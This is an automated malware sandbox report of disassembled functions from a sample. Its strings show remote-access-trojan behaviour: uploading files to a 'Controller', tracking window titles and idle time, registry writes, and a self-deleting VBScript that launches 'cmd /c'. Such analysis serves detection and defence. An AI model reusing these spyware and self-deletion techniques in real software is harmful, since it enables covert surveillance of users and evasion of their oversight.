Part of subcall function 0248B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B89A

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0247A2B0

Strings

xAG, xrefs: 0247A0EA
@CG, xrefs: 0247A180
@CG, xrefs: 0247A18B
XCG, xrefs: 0247A135
xAG, xrefs: 0247A0FA
XCG, xrefs: 0247A290

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: @CG$@CG$XCG$XCG$xAG$xAG
API String ID: 3795512280-3163867910
Opcode ID: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
Instruction ID: 7109f3967a4b0c488a8329376cf9c617966173e66ec5307c3a4980ee396ef782
Opcode Fuzzy Hash: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
Instruction Fuzzy Hash: C35180316043445BC715FB729864AFF335BAB90340F00042FEA66A7294EFA59A05CE62

Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004500B1

Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8

_free.LIBCMT ref: 004500A6

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

_free.LIBCMT ref: 004500C8
_free.LIBCMT ref: 004500DD
_free.LIBCMT ref: 004500E8
_free.LIBCMT ref: 0045010A
_free.LIBCMT ref: 0045011D
_free.LIBCMT ref: 0045012B
_free.LIBCMT ref: 00450136
_free.LIBCMT ref: 0045016E
_free.LIBCMT ref: 00450175
_free.LIBCMT ref: 00450192
_free.LIBCMT ref: 004501AA

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A

Function 024C02D4 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024C0318

Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF567
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF579
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF58B
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF59D
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF5AF
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF5C1
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF5D3
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF5E5
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF5F7
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF609
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF61B
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF62D
Part of subcall function 024BF54A: _free.LIBCMT ref: 024BF63F

_free.LIBCMT ref: 024C030D

Part of subcall function 024B6D2C: HeapFree.KERNEL32(00000000,00000000,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?), ref: 024B6D42
Part of subcall function 024B6D2C: GetLastError.KERNEL32(?,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?,?), ref: 024B6D54

_free.LIBCMT ref: 024C032F
_free.LIBCMT ref: 024C0344
_free.LIBCMT ref: 024C034F
_free.LIBCMT ref: 024C0371
_free.LIBCMT ref: 024C0384
_free.LIBCMT ref: 024C0392
_free.LIBCMT ref: 024C039D
_free.LIBCMT ref: 024C03D5
_free.LIBCMT ref: 024C03DC
_free.LIBCMT ref: 024C03F9
_free.LIBCMT ref: 024C0411

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction ID: a639601d10f30ea1bfbe6496a219920760eaae7d71b62c05bdec23dfe9cd89cc
Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction Fuzzy Hash: D6314E35608204DFEBA1AA7AD844B9B7BEEEF00314F65541FE458D7260DF75ED40CA24

Function 0248119D Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 024811AC

Part of subcall function 02482A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02482A4A
Part of subcall function 02482A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0247BBB3,004660E0,00000001,000000AF,00465554), ref: 02482A65
Part of subcall function 02482A3C: RegCloseKey.ADVAPI32(?,?,?,?,0247BBB3,004660E0,00000001,000000AF,00465554), ref: 02482A70

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 024811E8
CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 0248124D

Part of subcall function 0248271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0248273E
Part of subcall function 0248271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0248275C
Part of subcall function 0248271E: RegCloseKey.ADVAPI32(00000000), ref: 02482767

CloseHandle.KERNEL32(00000000), ref: 024811F7

Part of subcall function 0248A8ED: GetLocalTime.KERNEL32(00000000), ref: 0248A907

OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 024814C1

Strings

WDH, xrefs: 02481257, 0248125D, 024814C7
TTF, xrefs: 0248120F
BG, xrefs: 02481284
0DG, xrefs: 024811D5

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
String ID: 0DG$TTF$WDH$BG
API String ID: 65172268-1505503698
Opcode ID: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
Instruction ID: 64b2137e487866e941b983d6caa003f2c8c50c3abe6c6b0c7478c04d2303f951
Opcode Fuzzy Hash: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
Instruction Fuzzy Hash: AB71D3316142405BC614FB72DC51EEF77AAAFD0740F40052FF96A931A0EFA49A49CEA7

Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041912D
70545D90.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
Sleep.KERNEL32(000003E8), ref: 0041926D
GetLocalTime.KERNEL32(?), ref: 0041927C
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365

Strings

XCG, xrefs: 0041918A
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041920E, 00419229, 004192A0
XCG, xrefs: 0041931E
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00419213
XCG, xrefs: 0041923C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Sleep$70545CreateDirectoryH_prologLocalTime
String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 2469329295-65789007
Opcode ID: 306d46327beb382721a8c7df0595fb78dfa1fe032c600793bc8fb48e37c28519
Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
Opcode Fuzzy Hash: 306d46327beb382721a8c7df0595fb78dfa1fe032c600793bc8fb48e37c28519
Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799

Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(00000000,?,?), ref: 004042A5
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,00473D54,0040192B), ref: 004043CB
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,00473D54,0040192B), ref: 004043D5
WSAGetLastError.WS2_32(?,?,?,?,00473D54,0040192B), ref: 004043E7

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

TLS Error 2, xrefs: 0040431A
TLS Error 1, xrefs: 004042FC
TLS Authentication Failed, xrefs: 0040435E
Connection Refused, xrefs: 0040443E
TLS Handshake... | , xrefs: 004042C9
Connection Failed: , xrefs: 0040440C
TLS Error 3, xrefs: 0040439D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: 913e5ce5664d02b9a733c4ea1aeddfd001a9ff0370ccb71c9cfc801240c5479b
Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
Opcode Fuzzy Hash: 913e5ce5664d02b9a733c4ea1aeddfd001a9ff0370ccb71c9cfc801240c5479b
Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
ExitProcess.KERNEL32 ref: 0040C832

Strings

exepath, xrefs: 0040C69F
""", 0, xrefs: 0040C74F
@CG, xrefs: 0040C67D
open, xrefs: 0040C820
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C767
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C7D5
.vbs, xrefs: 0040C6CD
Temp, xrefs: 0040C708

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-390638927
Opcode ID: 85c94fb7387344732ab2637830309ffaafed81639842ef67bffad6ffa7c71db4
Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
Opcode Fuzzy Hash: 85c94fb7387344732ab2637830309ffaafed81639842ef67bffad6ffa7c71db4
Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99

Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F429
_free.LIBCMT ref: 0044F44D
_free.LIBCMT ref: 0044F45A
_free.LIBCMT ref: 0044F47F
_free.LIBCMT ref: 0044F48C
_free.LIBCMT ref: 0044F495
_free.LIBCMT ref: 0044F773
_free.LIBCMT ref: 0044F77B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58

Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,008E54D8,00475BF0,00473D54,00000000,008E54D8,004017F3,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004047FD
SetEvent.KERNEL32(00000001,?,00000000,00401913), ref: 00404808
CloseHandle.KERNEL32(00000001,?,00000000,00401913), ref: 00404811
closesocket.WS2_32(00000000), ref: 0040481F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00401913), ref: 00404856
SetEvent.KERNEL32(00000000,?,00000000,00401913), ref: 00404867
WaitForSingleObject.KERNEL32(00000001,000000FF,?,00000000,00401913), ref: 0040486E
SetEvent.KERNEL32(00000001,?,00000000,00401913), ref: 00404880
CloseHandle.KERNEL32(00000000,?,00000000,00401913), ref: 00404885
CloseHandle.KERNEL32(00000001,?,00000000,00401913), ref: 0040488A
SetEvent.KERNEL32(00000001,?,00000000,00401913), ref: 00404895
CloseHandle.KERNEL32(00000001,?,00000000,00401913), ref: 0040489A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

Function 02478056 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 325fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 024781B3
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 02478229
__aulldiv.LIBCMT ref: 02478250
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 02478374
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0247838F
CloseHandle.KERNEL32(00000000), ref: 02478467
CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 02478481
CloseHandle.KERNEL32(00000000), ref: 024784BD

Strings

Uploading file to Controller: , xrefs: 024782DE
>G, xrefs: 024780EE

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
String ID: Uploading file to Controller: $>G
API String ID: 1884690901-111729153
Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
Instruction ID: b70db30b368de900130464df736b1030277d39fe73b9b0b0107b5a3079c08ca4
Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
Instruction Fuzzy Hash: 12B191716083409FC615FB25C854BEFB7A6EF84310F40492EF9A992290EFB49949CF97

Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D

GetLastError.KERNEL32 ref: 00454A96
__dosmaperr.LIBCMT ref: 00454A9D
GetFileType.KERNEL32(00000000), ref: 00454AA9
GetLastError.KERNEL32 ref: 00454AB3
__dosmaperr.LIBCMT ref: 00454ABC
CloseHandle.KERNEL32(00000000), ref: 00454ADC
CloseHandle.KERNEL32(?), ref: 00454C26
GetLastError.KERNEL32 ref: 00454C58
__dosmaperr.LIBCMT ref: 00454C5F

Strings

H, xrefs: 00454BE4

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A

Function 0248938F Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 174sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02489394
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02489452
Sleep.KERNEL32(000003E8), ref: 024894D4
GetLocalTime.KERNEL32(?), ref: 024894E3
Sleep.KERNEL32(00000000,00000018,00000000), ref: 024895CC

Strings

XCG, xrefs: 024894A3
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0248947A
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 02489475, 02489490, 02489507
XCG, xrefs: 024893F1
XCG, xrefs: 02489585

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryH_prologLocalTime
String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3069631530-65789007
Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
Instruction ID: e9b688fc469ce22327e3d4766820336216be2de041adffef5898a7ca4d443bd2
Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
Instruction Fuzzy Hash: E3519371A002949ACF14FBB5CC54AFE77BAAB45300F00406FE95AA7284EF745E85DF61

Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040A456
Sleep.KERNEL32(000001F4), ref: 0040A461
GetForegroundWindow.USER32 ref: 0040A467
GetWindowTextLengthW.USER32(00000000), ref: 0040A470
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
Sleep.KERNEL32(000003E8), ref: 0040A574

Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

], xrefs: 0040A508
[, xrefs: 0040A50E
{ User has been idle for , xrefs: 0040A5AB
minutes }, xrefs: 0040A59F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: cff8a6c4555c4ab39a6c5e5f84c0802defa90ad63e760c4af6d426aac16ee484
Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
Opcode Fuzzy Hash: cff8a6c4555c4ab39a6c5e5f84c0802defa90ad63e760c4af6d426aac16ee484
Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

udp, xrefs: 00413D17, 00413D1F, 00413D23
65535, xrefs: 00413C6A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE

Function 02483ECE Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

udp, xrefs: 02483F7E, 02483F86, 02483F8A
65535, xrefs: 02483ED1

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
Instruction ID: 9b8b66cf5a363f583d2a39bb327b92a237778e26eb8b66b3e2dbf12521602d08
Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
Instruction Fuzzy Hash: 7741F9312283029BD721BE69D90473F7BE8EF86B54F04087FF95597391D765C481CA62

Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
__dosmaperr.LIBCMT ref: 004393CD
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
__dosmaperr.LIBCMT ref: 0043940A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
__dosmaperr.LIBCMT ref: 0043945E
_free.LIBCMT ref: 0043946A
_free.LIBCMT ref: 00439471

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 3a03948a9db99e40fdecf6d9a4862696ed7b2a7002e1adf9c9438b55df8a7d6d
Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
Opcode Fuzzy Hash: 3a03948a9db99e40fdecf6d9a4862696ed7b2a7002e1adf9c9438b55df8a7d6d
Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9

Function 024A95C8 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

